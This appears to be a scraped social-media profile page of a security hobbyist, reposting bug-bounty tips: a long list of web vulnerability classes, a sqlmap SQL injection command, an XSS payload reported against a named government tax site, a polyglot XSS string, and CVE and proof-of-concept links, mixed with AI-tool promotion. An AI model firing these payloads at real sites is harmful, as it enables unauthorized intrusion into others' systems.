Olivia
Online
Samkok Heng
@SamkokH
🐉 A.T.T.A.C.K.E.R 🐅 V.I.S.I.O.N.A.R.Y 👁 👁 邢富国 🍾
Joined August 2019
68 Following
4 Followers
54 Posts
CVE-2023-25690: Request Smuggling attack on Apache HTTP Server, 9.8 rating 🔥
An old vulnerability with new POC.
Search on https://t.co/hv7QKSqxTR (>20kk res):
👉🏻 Link (tags): https://t.co/jACANLgspf
👉🏻 Link (no tags): https://t.co/DB1skILSBI
#vulnerability_map #cybersecurity
Cross-site scripting (XSS)
SQL injection (SQLi)
Cross-site request forgery (CSRF)
Server-side request forgery (SSRF)
Remote code execution (RCE)
File inclusion
Authentication bypass
Information disclosure
XML injection
Clickjacking
Open redirect
Directory traversal
Session hijacking
Buffer overflow
Command injection
LDAP injection
XPath injection
JSON injection
Path traversal
Broken access control
Insufficient authentication and authorization
Insecure direct object references
Insecure communications
Improper error handling
Weak cryptography
Business logic vulnerabilities
Server-side template injection (SSTI)
Server-side script injection (SSSI)
Prototype pollution
Cross-origin resource sharing (CORS) misconfiguration
HTTP response splitting
Object injection
Mass assignment vulnerabilities
Race conditions
HTML injection (also known as injection via untrusted input)
Broken cryptography
Broken authentication and session management
Server-side cache poisoning
Server-side deserialization
Websocket vulnerabilities
Information leakage vulnerabilities
Server-side subdomain takeover
Insecure file upload
Sensitive data exposure
Broken access controls
Click-to-play attacks
Authentication weaknesses
Web cache poisoning
Template injection vulnerabilities
Remote file inclusion (RFI)
Local file inclusion (LFI)
OAuth and OpenID Connect weaknesses
HTTP request smuggling
Insufficient transport layer protection
Insecure storage of sensitive information
Insecure password management
Insecure permissions
Insecure random number generation
Insufficient logging and monitoring
Mobile app vulnerabilities
API vulnerabilities
Business logic flaws
Docker and containerization vulnerabilities
Race conditions
Insecure deserialization
Subdomain takeover
Bypassing rate limits
Social engineering attacks
DNS cache poisoning
Path traversal attacks
Command injection (also known as OS command injection)
XML external entity (XXE) injection
Host header injection
Security misconfigurations
Clickjacking (also known as UI redressing)
HTML5 security issues
HTTPS stripping
DNS rebinding
Cryptographic attacks, such as Padding Oracle attacks and POODLE attacks
Side-channel attacks
Buffer overflows
Time-of-check to time-of-use (TOCTTOU) vulnerabilities
Unvalidated redirects and forwards
Broken function-level authorization
Server-side request forgery (SSRF) with DNS rebinding
Blind SQL injection
Cross-Site WebSocket Hijacking (CSWSH)
Insecure third-party dependencies
Man-in-the-middle (MITM) attacks
HTTP parameter pollution
Exploiting weak password policies
DOM-based XSS
Cross-Site WebSocket Forgery (CSWF)
Cryptographic key management issues
Security misconfigurations in serverless applications
Insecure direct object references in RESTful APIs
Insecure storage of secrets in mobile apps
Insecure deserialization in RESTful APIs
Insufficient monitoring and logging of API activities
Business process vulnerabilities in e-commerce applications
Improper certificate validation in SSL/TLS
Exploiting insecure default configurations of software components
Vulnerabilities in biometric authentication systems
CONFIRMED! @Synacktiv successfully executed a TOCTOU exploit against Tesla – Gateway. They earn $100,000 as well as 10 Master of Pwn points and this Tesla Model 3. #Pwn2Own #P2OVancouver
SQL Injection on JSON body POST request. It took me some time, but finally found the right technique and injection point. ``sqlmap -r request.txt --level=5 --risk=3 --force-ssl --ignore-code=500 --dbs`` #SQLInjection #BugBounty
ChatGPT prompts that'll save you hours a day at work (ranked in order):
Blue Team Toolkit
A friendly reminder:
You can build your own AI-powered apps.
Even if you’ve never coded before.
Build your own text and image-generation app within an hour using:
- Bubble
- Stable Diffusion
- OpenAI
Go to https://t.co/KRO7A2JXn2 to start building.
ultra-modern generative ai🗨️:
• AI2
• AI21
• mdm
• gpt-J
• gpt-3
• x-clip
• bloom
• cohere
• gopher
• dall•e 2
• craiyon
• tabnine
• jukebox
• chatGPT ***
• anthropic
• codegeex
• nvidia get3d
• dreamfusion
• stable diffusion
• meta make-a-video
Amazing One-Liner for Y'all for
WEB RECON DISCOVERY-
Explanation below 🧵👇
I’ve been a security engineer for a whole ass year now. Here are a few Infosec training resources shared w/ me that have been helpful over the last year in my role:
🧵1/10
XSS in @GST_Council
Payload: lookhere");<%2Fscript><img src%3Dx onerror%3Dalert('XSS')>
1)the keyword “lookhere” was used to detect all the places the input was reflected
2)The rest is responsible for balancing the payload
#infosec #bugbountytips #xss
🕸 Website:
"Please enter your first name"
😎 You:
"jaVasCript:/-//*\/'/"/*/(/ */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"
GitHub - trganda/CVE-2022-22980: Poc of CVE-2022-22980 - https://t.co/u8DOTX5m6j
@fancyfrenchnft https://t.co/Lna63vt4gx
Folks, learn to use Linux🐧 terminal like a PRO.
I made this quick cheatsheet listing all the essential Linux terminal shortcuts.
Feel free to add more if I have missed any.🤩
Meet VT4Browsers++, our browser extension to enrich all IOCs in any website you visit. Read all details here: https://t.co/JQVlPhQFIP
Most Popular Users
Elon Musk 
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.1M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.9M followers
Taylor Swift
@taylorswift13
80.7M followers
Lady Gaga
@ladygaga
72.3M followers
Kim Kardashian
@kimkardashian
69.4M followers
Virat Kohli
@imvkohli
68.7M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.3M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60M followers